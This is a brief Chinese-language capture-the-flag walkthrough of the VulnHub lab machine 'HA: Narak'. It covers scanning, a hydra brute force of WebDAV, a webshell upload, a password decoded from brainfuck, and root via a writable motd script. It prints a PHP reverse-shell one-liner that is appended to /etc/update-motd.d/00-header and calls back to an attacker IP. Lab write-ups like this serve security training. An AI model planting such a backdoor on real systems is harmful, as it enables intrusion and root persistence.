HA: NARAK

靶机地址：https://www.vulnhub.com/entry/ha-narak,569/

 

导入VM，用nmap获取靶机IP:192.168.99.135

获取开放端口

访问80端口

用dirb扫描网站目录，存在一个webdav的页面

尝试访问，发现需要密码

抓取网站的关键字作为字典

 用hydra爆破，得到账号：yamdoot 密码：Swarg

登陆进去是空的

用cadaver上传webshell到靶机上

 

在kali上用nc进行监听，再访问页面，拿到靶机的shell

 

拿到flag，但是没啥用

 获取存在rwx权限的文件

find / -type f -perm -ug=rwx 2>/dev/null 

得到brainfuck编码  解密得到：chitragupt

测试连接，是inferno用户的密码

 

下一步获取root权限，这里学到了一个新的提权方式，通过motd 文件（ssh的登录欢迎信息，主要还是可读可写可执行权限）来反弹一个root权限的shell

echo "php -r '\$sock=fsockopen(\"192.168.99.128\",4444);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" >>/etc/update-motd.d/00-header

 成功获取root权限

 

获取root.txt